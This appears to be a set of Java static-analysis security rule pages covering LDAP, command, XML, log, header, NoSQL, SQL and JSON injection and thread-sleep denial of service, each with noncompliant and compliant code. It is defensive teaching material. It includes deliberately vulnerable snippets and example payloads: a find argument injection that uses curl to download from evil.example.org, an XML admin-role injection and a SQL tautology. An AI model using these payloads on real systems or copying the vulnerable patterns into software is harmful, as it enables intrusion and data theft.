The following noncompliant code is vulnerable to LDAP injections because untrusted data is concatenated to an LDAP query without prior sanitization or validation.

Noncompliant code example

public boolean authenticate(HttpServletRequest req, DirContext ctx) throws NamingException {
  String user = req.getParameter("user");
  String pass = req.getParameter("pass");

  String filter = "(&(uid=" + user + ")(userPassword=" + pass + "))";

  NamingEnumeration<SearchResult> results = ctx.search("ou=system", filter, new SearchControls());
  return results.hasMore();
}

Compliant solution

public boolean authenticate(HttpServletRequest req, DirContext ctx) throws NamingException {
  String user = req.getParameter("user");
  String pass = req.getParameter("pass");

  String filter = "(&(uid={0})(userPassword={1}))";

  NamingEnumeration<SearchResult> results = ctx.search("ou=system", filter, new String[]{user, pass}, new SearchControls());
  return results.hasMore();
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries if it is available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server side, not in client-side front ends.

The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

For Java, the OWASP ESAPI functions encodeForDN and encodeForLDAP sanitize these characters and should be used; it is never a good practice to reinvent the wheel and write your own encoders.
However, if these libraries cannot be used, the Bouncy Castle Java framework provides an example of an encoder implementation for LDAP search filters.
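
When neither library is an option, a minimal escaper covering the search-filter characters listed above might look like the following sketch. It is illustrative only and not a substitute for a maintained encoder:

```java
public class LdapFilterEscaper {

    // Escapes the search-filter special characters as \XX hex sequences,
    // following the RFC 4515 representation.
    static String escapeFilterValue(String value) {
        StringBuilder sb = new StringBuilder();
        for (char c : value.toCharArray()) {
            switch (c) {
                case '\\':     sb.append("\\5c"); break;
                case '*':      sb.append("\\2a"); break;
                case '(':      sb.append("\\28"); break;
                case ')':      sb.append("\\29"); break;
                case '\u0000': sb.append("\\00"); break;
                default:       sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // "*" alone would match every entry; escaped, it only matches a literal asterisk.
        System.out.println(escapeFilterValue("*)(uid=*")); // \2a\29\28uid=\2a
    }
}
```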

In the compliant solution, the search method's filter arguments allow the query to be safely parameterized.

Resources

Standards

javasecurity:S5883

Why is this an issue?

OS command argument injections occur when an application executes operating system commands built from untrusted data, but the untrusted data is limited to the arguments.
Attackers cannot directly inject arbitrary commands that compromise the underlying operating system, yet they may still influence the behavior of the executed command in ways that expand their access, up to and including arbitrary command execution. The security of the application therefore depends on the behavior of the program being executed.

What is the potential impact?

An attacker exploiting an argument injection vulnerability is able to append arbitrary arguments to a system binary call. Depending on the command the arguments are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Java SE

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software on the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Noncompliant code example

@Controller
public class ExampleController
{
    @GetMapping(value = "/find")
    public void find(@RequestParam("filename") String filename) throws IOException {

        Runtime.getRuntime().exec("/usr/bin/find . -iname " + filename);
    }
}

Compliant solution

@Controller
public class ExampleController
{
    @GetMapping(value = "/find")
    public void find(@RequestParam("filename") String filename) throws IOException {

        String cmd1[] = new String[] {"/usr/bin/find", ".", "-iname", filename};
        Process proc = Runtime.getRuntime().exec(cmd1); // Compliant
    }
}

java.lang.Runtime is sometimes preferred over java.lang.ProcessBuilder for its ease of use, but flexible APIs often introduce security issues because edge cases are easily missed. The same compliant logic applies to java.lang.ProcessBuilder: pass the command and each of its arguments as separate array or list elements.

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

Here, java.lang.Runtime.exec(String[] cmdarray) passes each array element to the operating system as a distinct argument, so user-submitted data cannot be split into additional arguments or be interpreted by a shell.
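
The sketch below (the buildFindCommand helper is illustrative) shows why the array form defuses the earlier payload: the whole payload arrives as a single argument instead of being split into extra flags:

```java
import java.util.Arrays;
import java.util.List;

public class FindCommand {

    // Builds the find invocation as a list: each element reaches the OS as
    // exactly one argument, so a payload containing spaces stays a single
    // (harmless) search term rather than becoming additional flags.
    static List<String> buildFindCommand(String filename) {
        return Arrays.asList("/usr/bin/find", ".", "-iname", filename);
    }

    public static void main(String[] args) {
        List<String> cmd =
            buildFindCommand("-exec curl -o /tmp/x http://evil.example.org/malicious.php ;");
        // The payload occupies one slot; the list is still four elements long.
        System.out.println(cmd.size()); // 4

        // ProcessBuilder consumes the same list form:
        // new ProcessBuilder(cmd).start();
    }
}
```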

Resources

Documentation

Standards

javasecurity:S6399

Why is this an issue?

XML injections occur when an application builds an XML-formatted string from user input without prior validation or sanitization. In such a case, a tainted user-controlled value can tamper with the XML string's content. In particular, arbitrary elements and attributes can be inserted into the resulting XML document.

A malicious injection payload could, for example:

  • Insert tags into the main XML document.
  • Add attributes to an existing XML tag.
  • Change the data value inside a tag.

A malicious user-supplied value can perform other modifications depending on where and how the constructed data is later used.

What is the potential impact?

The consequences of an XML injection attack on an application vary greatly depending on the application’s logic. It can affect the application itself or another element if the XML document is used for cross-component data exchange. For this reason, the actual impact can range from benign information disclosure to critical remote code execution.

Information disclosure

An attacker can forge an attack payload that will modify the XML document so that it will become syntactically incorrect. In that case, when the data is later used, the parsing component will raise a technical error. If displayed back to the attacker or made available through log files, this technical error may disclose sensitive business or technical information.

This scenario, while generally the least severe, is the most frequently encountered, and it can combine with any other logic-dependent threat.

Internal requests tampering

Some applications communicate with backend micro-services APIs using XML-based protocols such as SOAP. When those applications are vulnerable to XML injections, attackers can tamper with the internal requests' content. This will allow them to change internal requests' parameters or locations which, in turn, can lead to various consequences like performing unauthorized actions or accessing sensitive data.

For example, altering a user creation request in such a way can lead to a privilege escalation if attackers manage to modify the default account privilege level.

Code execution

An application might build objects based on an XML serialization string. In that case, an attacker who exploits an XML injection could alter the serialization string to modify the corresponding object's properties.

Depending on the deserialization process, this might allow instantiating arbitrary objects or objects with sensitive properties altered. This can lead to arbitrary code being executed in the same way as a deserialization injection vulnerability.

How to fix it in Java SE

Code examples

The following code is an example of an overly simple authentication function: the role of a user is set in an XML file, and the default role is user.
This example is vulnerable to XML injection because it builds an XML string from user input without prior sanitization or validation.

In this particular case, the query can be exploited with the following string:

attacker</username><role>admin</role></user>
<user><username>foo

By adapting and inserting this string into the username field, an attacker would be able to log in as an admin.

Noncompliant code example

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String xml =
        "<user>" +
        "<username>" + req.getParameter("username") + "</username>" +
        "<role>user</role>" +
        "</user>";

    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    try {
        DocumentBuilder builder = factory.newDocumentBuilder();
        builder.parse(new InputSource(new StringReader(xml))); // Noncompliant
    } catch (ParserConfigurationException | SAXException e) {
        resp.sendError(400);
    }
}

Compliant solution

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {

    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    try {
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.newDocument();
        Element user = doc.createElement("user");
        doc.appendChild(user);

        Element usernameElement = doc.createElement("username");
        user.appendChild(usernameElement);
        usernameElement.setTextContent(req.getParameter("username"));

        Element role = doc.createElement("role");
        user.appendChild(role);
        role.setTextContent("user");

    } catch (ParserConfigurationException e) {
        resp.sendError(400);
    }
}

How does this work?

In most cases, building XML strings with a direct concatenation of user input is discouraged. While not always possible, a strong pattern-based validation can help sanitize tainted inputs. Likewise, converting to a harmless type can sometimes be a solution.

However, directly constructing Java objects should be preferred over handling the properties of objects as strings.

Programmatic object building

In most cases, an application can directly create documents from user input without having to build and parse an XML string. Doing so prevents injection vulnerabilities as XML document construction libraries and functions will properly escape and check the type of input values.

Sometimes, the application might need to include the user input in a document built from a trusted XML string. In that case, the recommended solution is to parse the trusted string first and then programmatically modify the resulting document.

The example compliant code takes advantage of the javax.xml and org.w3c.dom libraries capabilities to programmatically build XML documents.

Converting to a harmless type

When the application allows it, casting user-submitted data to a harmless type can help prevent XML injection vulnerabilities. In particular, converting user inputs to numeric types is an efficient sanitization mechanism.

This mechanism can be extended to other types, including more complex ones. However, care should be taken when dealing with them, as manually validating or sanitizing complex types can represent a challenge.

Note that choosing this solution can be error-prone: every user input has to be validated or sanitized without oversight.
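
As a sketch of the numeric-conversion approach (the userIdElement helper is illustrative):

```java
public class NumericCast {

    // Converts the untrusted input to an int before it is embedded in XML;
    // any injection payload fails the parse instead of reaching the document.
    static String userIdElement(String untrustedId) {
        int id = Integer.parseInt(untrustedId.trim()); // throws on non-numeric input
        return "<userId>" + id + "</userId>";
    }

    public static void main(String[] args) {
        System.out.println(userIdElement("42")); // <userId>42</userId>
        try {
            userIdElement("1</userId><role>admin</role>");
        } catch (NumberFormatException e) {
            System.out.println("rejected");
        }
    }
}
```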

Resources

Standards

javasecurity:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks could also occur requiring only field pollution, such as cross-site scripting (XSS) or code injection (for example, Log4Shell) if the logged data is fed to other application components, which may interpret the injected data differently.

The focus of this rule is newline character replacement.

Log forgery

An attacker who is able to create independent log entries by injecting log entry separators inserts bogus data into a log file to conceal their malicious activities. This makes it harder for an incident response team to trace the origin of the breach, as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in Java SE

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

private static final Logger logger = Logger.getLogger("Logger");

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {

  String data = request.getParameter("data");
  if(data != null){
    logger.log(Level.INFO, "Data: {0} ", data);
  }
}

Compliant solution

private static final Logger logger = Logger.getLogger("Logger");

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {

  String data = request.getParameter("data");
  if(data != null){
    data = data.replaceAll("[\n\r]", "_");
    logger.log(Level.INFO, "Data: {0} ", data);
  }
}

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.
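
A slightly broader variant of the compliant solution's replacement, written as an illustrative helper that also neutralizes other control characters:

```java
public class LogSanitizer {

    // Replaces CR, LF, and all other control characters so one request can
    // never span multiple log entries or corrupt terminal output.
    static String sanitize(String data) {
        return data == null ? null : data.replaceAll("\\p{Cntrl}", "_");
    }

    public static void main(String[] args) {
        System.out.println(sanitize("login ok\nINFO fake entry")); // login ok_INFO fake entry
    }
}
```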

Resources

Standards

javasecurity:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications constructing HTTP response headers based on tainted data could allow attackers to change security sensitive headers like Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject newline characters into headers to craft malformed HTTP responses. In this case, the application would be vulnerable to a larger range of attacks, such as HTTP Response Splitting/Smuggling. Most of the time this type of attack is mitigated by default in modern web application frameworks, but there might be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  String value = req.getParameter("value");
  resp.addHeader("X-Header", value); // Noncompliant
}

Compliant solution

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String value = req.getParameter("value");

    List<String> whitelist = Arrays.asList("safevalue1", "safevalue2");
    if (!whitelist.contains(value))
      throw new IOException();

    resp.addHeader("X-Header", value); // Compliant
}

Resources

javasecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Apache Commons

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

@Controller
public class ExampleController
{
    @GetMapping(value = "/exec")
    public void exec(@RequestParam("command") String command) throws IOException {

        CommandLine cmd = new CommandLine(command);
        DefaultExecutor executor = new DefaultExecutor();
        executor.execute(cmd);
    }
}

Compliant solution

@Controller
public class ExampleController
{
    @GetMapping(value = "/exec")
    public void exec(@RequestParam("command") String command) throws IOException {

        List<String> allowedCmds = new ArrayList<String>();
        allowedCmds.add("/bin/ls");
        allowedCmds.add("/bin/cat");

        if (allowedCmds.contains(command)){
            CommandLine cmd = new CommandLine(command);
            DefaultExecutor executor = new DefaultExecutor();
            executor.execute(cmd);
        }
    }
}

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple ones to avoid ReDoS attacks. For example, you can accept only a specific set of executables by using ^/bin/(ls|pwd|grep)$.

Important note: The application must perform validation on the server side, not in client-side front-ends.
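Such a server-side check can be sketched as follows with an anchored regex, applied before any execution (a minimal illustration; the accepted command paths are examples):

```java
import java.util.regex.Pattern;

public class CommandAllowList {
    // Anchored regex: only these exact absolute paths pass. Keeping the
    // pattern this simple also avoids ReDoS concerns.
    private static final Pattern ALLOWED = Pattern.compile("^/bin/(ls|pwd|grep)$");

    public static boolean isAllowed(String command) {
        return command != null && ALLOWED.matcher(command).matches();
    }
}
```

Any input that is not an exact match, including payloads that append shell metacharacters, is rejected.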

Neutralize special characters

If the application must execute complex commands that cannot be restricted to a pre-approved list, the cleanest approach is to use special sanitization components, such as org.apache.commons.exec.CommandLine.addArguments(String[] addArguments).

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • `
  • \
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters include single quotes ('), dashes (-), and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.
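A simple form of this neutralization is to reject option-like values outright before they reach the command line (a sketch only; the delimiter set is illustrative and should be adapted to the target program):

```java
public class ArgumentGuard {
    // Reject option-like values (leading '-') so input such as "-exec" can
    // never be parsed as an option, and reject common argument delimiters.
    public static boolean isSafeArgument(String arg) {
        if (arg == null || arg.isEmpty() || arg.startsWith("-")) {
            return false;
        }
        return !arg.contains(" ") && !arg.contains("'");
    }
}
```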

Here org.apache.commons.exec.CommandLine.addArguments(String[] addArguments) takes care of escaping the passed arguments and internally creates a single string given to the operating system to be executed.

Resources

Documentation

Standards

javasecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Legacy Mongo Java API

Code examples

The following code is vulnerable to NoSQL injections because untrusted data is concatenated to the $where operator. This operator indicates to the backend that the expression needs to be interpreted, resulting in code injection.

Noncompliant code example

import com.mongodb.MongoClient;
import com.mongodb.DB;
import com.mongodb.DBCollection;
import com.mongodb.BasicDBObject;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws UnknownHostException
{
    String input = req.getParameter("input");

    MongoClient mongoClient = new MongoClient();
    DB database             = mongoClient.getDB("ExampleDatabase");
    DBCollection collection = database.getCollection("exampleCollection");
    BasicDBObject query     = new BasicDBObject();

    query.append("$where", "this.field == \"" + input + "\"");

    collection.find(query);
}

Compliant solution

import com.mongodb.MongoClient;
import com.mongodb.DB;
import com.mongodb.DBCollection;
import com.mongodb.BasicDBObject;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws UnknownHostException
{
    String input = req.getParameter("input");

    MongoClient mongoClient = new MongoClient();
    DB database             = mongoClient.getDB("ExampleDatabase");
    DBCollection collection = database.getCollection("exampleCollection");
    BasicDBObject query     = new BasicDBObject();

    query.append("field", input);

    collection.find(query);
}

How does this work?

Pre-approved list

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For NoSQL injections, the cleanest way to do so is to validate the input before using it in a query.

Create a list of authorized and secure strings that you want the application to be able to use in a query.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

The list can be either a regex string, an array, or validators on specific ranges of characters. If you use regexes, choose simple ones to avoid ReDoS attacks.

Important note: The application must perform validation on the server side, not in client-side front-ends.
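A minimal sketch of such a pre-approved pattern (the character range and length limit are illustrative and should match the application's actual data):

```java
import java.util.regex.Pattern;

public class MongoInputValidator {
    // Accept only short alphanumeric identifiers; input containing characters
    // such as '$', '{' or quotes that could smuggle operators is rejected.
    private static final Pattern SAFE = Pattern.compile("^[A-Za-z0-9_-]{1,64}$");

    public static boolean isSafe(String input) {
        return input != null && SAFE.matcher(input).matches();
    }
}
```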

Treat operators as dangerous

As a rule of thumb if no operators are needed, you should generally reject user input containing them. If some operators are necessary, you should restrict their use.

Some operators execute JavaScript, and their use should be restricted for both untrusted input and internal code.
These operators include:

  • $where
  • $function
  • $accumulator
  • mapReduce

Depending on your use case, you should first try using regular API calls before using any of these operators.
For example, using a $where operator is unnecessarily complex when only a simple search is required. It also leads to performance problems.

Note: Server-side scripting can be disabled.

Regular operators can also lead to data leaks.
For example, attackers can use "comparison query operators" in their attack data to trick the backend database into giving hints about sensitive information or entirely giving it out.

In the previous example, the untrusted data doesn’t need validation for its use case. Moving it out of a $where expression into a proper field query is enough.

Resources

Articles & blog posts

Standards

javasecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

An attacker crafts input that modifies the existing query, changing its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Java SE

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

@RestController
public class ApiController
{
    @Autowired
    Connection connection;

    @GetMapping(value = "/authenticate")
    @ResponseBody
    public ResponseEntity<String> authenticate(
        @RequestParam("user") String user,
        @RequestParam("pass") String pass) throws SQLException
    {
        String query = "SELECT * FROM users WHERE user = '" + user + "' AND pass = '" + pass + "'";

        try (Statement statement = connection.createStatement()) {

            ResultSet resultSet = statement.executeQuery(query);

            if (!resultSet.next()) {
                return new ResponseEntity<>("Unauthorized", HttpStatus.UNAUTHORIZED);
            }
        }

        return new ResponseEntity<>("Authentication Success", HttpStatus.OK);
    }
}

Compliant solution

@RestController
public class ApiController
{
    @Autowired
    Connection connection;

    @GetMapping(value = "/authenticate")
    @ResponseBody
    public ResponseEntity<String> authenticate(
        @RequestParam("user") String user,
        @RequestParam("pass") String pass) throws SQLException
    {
        String query = "SELECT * FROM users WHERE user = ? AND pass = ?";

        try (PreparedStatement statement = connection.prepareStatement(query)) {
            statement.setString(1, user);
            statement.setString(2, pass);

            ResultSet resultSet = statement.executeQuery();

            if (!resultSet.next()) {
                return new ResponseEntity<>("Unauthorized", HttpStatus.UNAUTHORIZED);
            }
        }

        return new ResponseEntity<>("Authentication Success", HttpStatus.OK);
    }
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, and some do not - because they do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

javasecurity:S6390

Why is this an issue?

Most modern applications use threads to handle incoming requests or other long-running tasks concurrently. In some cases, the number of concurrent threads is limited to avoid system resource exhaustion due to too numerous actions being run.

When an application uses user-controlled data as a parameter of a thread suspension operation, a Denial of Service attack can be made possible.

What is the potential impact?

An attacker with the capability to insert an arbitrary duration into a thread suspension operation could suspend the corresponding thread for a long time. Depending on the application’s architecture and the thread handling logic, this can lead to a complete Denial of Service of the application.

Indeed, if the number of threads, either created by the application or allocated by a web server, is limited, the attacker will be able to suspend all of them at the same time. With no threads left to handle actions, the application may respond incorrectly, slow down, or become completely unresponsive.

How to fix it in Java SE

Code examples

This code is vulnerable to a Denial of Service because it sets a thread’s suspension time from user input without prior validation or sanitization.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        Long time = Long.parseLong(req.getParameter("time"));
        try {
            Thread.sleep(time); // Noncompliant
        } catch (InterruptedException e) {
            resp.sendError(500);
        }
    }

Compliant solution

protected void compliant(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        Long time = Long.parseLong(req.getParameter("time"));
        try {
            Thread.sleep(Math.min(time, 1000));
        } catch (InterruptedException e) {
            resp.sendError(500);
        }
    }

How does this work?

In most cases, it is discouraged to define a thread suspension time from user input.

If really necessary, the application should ensure that the provided suspension time is below a safe limit. Such a limit should be evaluated and set to the lowest possible time that ensures the application’s operation and restricts denial of service attacks.

The example compliant code uses the Math.min function to ensure the suspension duration is below the limit of one second.

Note that even when the suspension time is limited, an attacker who submits numerous requests at high speed can still manage to consume all available threads.

Resources

Standards

javasecurity:S6398

Why is this an issue?

JSON injections occur when an application builds a JSON-formatted string from user input without prior validation or sanitization. In such a case, a tainted user-controlled value can tamper with the JSON string content. In particular, unexpected arbitrary elements can be inserted into the corresponding JSON object. Those modifications can include:

  • Adding additional keys to a JSON dictionary.
  • Changing value types.
  • Adding elements to an array.

A malicious user-supplied value can perform other modifications depending on where and how the constructed data is later used.

What is the potential impact?

The consequences of a JSON injection attack into an application vary greatly depending on the application’s logic. It can affect the application itself or another element if the JSON string is used for cross-component data exchange. For this reason, the actual impact can range from benign information disclosure to critical remote code execution.

Information disclosure

An attacker can forge an attack payload that will modify the JSON string so that it will become syntactically incorrect. In that case, when the data is later used, the parsing component will raise a technical error. If displayed back to the attacker or made available through log files, this technical error may disclose sensitive business or technical information.

This scenario, while generally the least severe, is the most frequently encountered. It can combine with any other logic-dependent threat.

Privilege escalation

An application that relies on JSON to store or propagate users' authentication levels and roles is exposed to privilege escalation. Indeed, an attacker could tamper with the permissions storage object to insert arbitrary roles or privileges.

While highly specific, similar issues can be faced in the following situations:

  • An application builds JSON payloads for HTTP requests.
  • An application builds JWT from user input.

Code execution

An application might build objects based on a JSON serialization string. In that case, an attacker that would exploit a JSON injection could be able to alter the serialization string to modify the corresponding object’s properties.

Depending on the deserialization process, this might allow instantiating arbitrary objects or objects with sensitive properties altered. This can lead to arbitrary code being executed in the same way as a deserialization injection vulnerability.

How to fix it in Java SE

Code examples

The following code is vulnerable to a JSON injection vulnerability because it builds a JSON string from user input without prior sanitization or validation. Therefore, an attacker can submit a tainted value that will tamper with the corresponding JSON object structure.

Noncompliant code example

import org.json.JSONObject;

public void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    try {
        String tainted = req.getParameter("value");
        String json = "{\"key\":\""+ tainted +"\"}";
        JSONObject obj = new JSONObject(json); // Noncompliant
    } catch (JSONException e) {
        resp.sendError(400);
    }
}

Compliant solution

import org.json.JSONObject;

public void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    JSONObject obj = new JSONObject();
    obj.put("key", req.getParameter("value"));
}

How does this work?

In most cases, it is discouraged to build JSON strings with a direct concatenation of user input. While not always possible, a strong pattern-based validation can help sanitize tainted inputs. Likewise, converting to a harmless type can sometimes be a solution.

However, avoiding handling objects' properties as strings by directly constructing Java objects should be the preferred way.

Programmatic object building

In most cases, an application can directly create objects from user input without having to build and parse a JSON string. Doing so prevents injection vulnerabilities as JSON object construction libraries and functions will properly escape and check the type of input values.

Sometimes, the application might need to include the user input in an object built from a trusted JSON string. In that case, the recommended solution is to parse the trusted string first and then programmatically modify the resulting object.

The example compliant code uses the org.json library's capabilities to dynamically build a JSON object without string parsing.

Converting to a harmless type

